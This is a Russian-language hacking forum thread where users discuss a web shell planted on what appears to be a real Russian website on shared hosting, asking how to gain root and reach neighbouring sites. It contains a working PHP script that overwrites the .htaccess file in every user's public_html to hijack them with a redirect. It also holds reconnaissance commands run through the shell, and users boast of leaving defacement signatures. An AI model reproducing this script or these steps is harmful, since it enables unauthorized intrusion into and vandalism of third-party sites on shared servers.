Давайте посмотрим, есть ли там чё интересного? Вот закинул http://master-site.ru/docs/portfolio/index55.php?c=l&d=%2F А дальше у меня еще опыта нету. Увы=( Какие мысли, че с этим делать? Юзать сплоит, пока еще не научился. Может, кто-нибудь там сделает рут или может еще что и на примере покажет как все он это делал. Интересно же)
там кст хост агава. Обычно делаю только вот такие вот вещи. Типо акцесс во всех папках меняю. <?php set_time_limit(0); $dir="/home/../../"; //измени! $htaccess="RewriteEngine on RewriteRule ^index.([^\/]*)(\/?)?$ / [R] "; $c=0; $k=0; $handle = opendir ($dir); while($dh = readdir($handle)) { $dh=trim($dh); if( $dh!=".." && $dh!="" ){ $file[$c]=$dh; $c++;} } closedir($handle); for($c=0;$c<sizeof($file);$c++) { if(is_dir($dir.$file[$c])) { $path_to_htaccess[$k]=$dir . "/" . $file[$c] . "/" . "public_html" . "/" . ".htaccess"; $k++; } } for($c=0;$c<sizeof($path_to_htaccess);$c++) { //unlink($path_to_htaccess[$c]); $handle=fopen($path_to_htaccess[$c],"w"); //или лучше "a+"? fwrite($handle,$htaccess); fclose($handle); } ?>
cd ../..;cat !index.html гг а что тут всё просто))), а рута.... эххх фрях же... работает чмод: PHP: cd ../..;pwd;id;uname -a;ls -la;chmod +r guest.php видим на примере гуеста: -rwxrwxr-x 1 ulhotel3 virthost 10927 Dec 21 20:58 guest.php
Ну от того что он там работает, мне вот что-то от части не легче. А вот как бы получить доступ к другим сайтам, только имея рут? Как например узнать адреса сайтов всех, какие там есть?
узнать?? гг да оч просто к примеру zvezda3 - zvezda.ru ))) а войти в другие папки, тока root права... хотя бы на чтение).. там же FreeBSD, так что... забудь, к тому же сайт заблокирован
жди пока появиться сплоет под двигу, кста шеллу давно снесли... а я где-то смог поднять немножко прав путем чмода и оставил свою скромненькую надпись
Да я на этом сайте уже докуя раз оставлял свою подпись. Просто интересно была, что же все таки большего можно сделать. а шелл действительно кто-то снес. ((
Ну так снесла АГАВА, так как он уже и был заблокирован, ибо всем спасибо, спасибо за работу ))) тему можно и клозе